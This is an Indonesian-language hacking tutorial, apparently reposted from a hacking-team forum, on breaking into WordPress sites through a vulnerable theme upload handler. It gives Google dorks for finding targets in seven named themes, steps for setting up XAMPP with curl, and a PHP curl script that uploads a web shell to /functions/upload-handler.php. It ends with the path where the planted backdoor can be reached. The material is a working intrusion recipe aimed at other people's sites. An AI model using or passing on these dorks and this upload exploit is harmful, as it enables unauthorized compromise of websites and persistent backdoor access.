Themes File Upload

bahan: xampp, backdoor.php
dork :
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

exploit : /functions/upload-
handler.php


1. Pertama cari target dengan dork di atas [kembangkan sendiri dorknya]
2. Setelah dapet target tambahkan exploit ntar jadinya gini www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php
3. Jika Sudah , Buka Folder Xammp
4. Buka folder PHP , Dan cari code PHP.INI ,
Tekan Control + F / CTRL + F ,
5. Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda (;)ni berarti kamu sudah succes ..
6. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
7. Copykan exploit di bawah ini
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/
themes/rockstar-theme/functions/upload-
handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@
$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
8. Save exploit di atas dengan ekstensi x.php dan ingat tadi shell kita up.php jadi ganti $uploadfile="upload.php"; jadi $uploadfile="up.php";
9. Buka dan masuk xampp kita ketik : cd\ lalu tekan Enter lalu jika CMD kembali ke System C atau seperti ini C:\Documents and Settings\Alliance>cd\ berarti berhasil
10. Ketik cd /xammp/php tekan Enter
11. Kemudian ketik cd:\xammp\php\>: php x.php trus enter
12. Jika keluar tulisan nama shell anda di CMD berarti anda sukses :p

akses backdoor di : www.site.com/wp-content/uploads/2013/11/up.php


sumber : http://forum.wonogiri-cyber-team.org/forum/viewthread.php?thread_id=25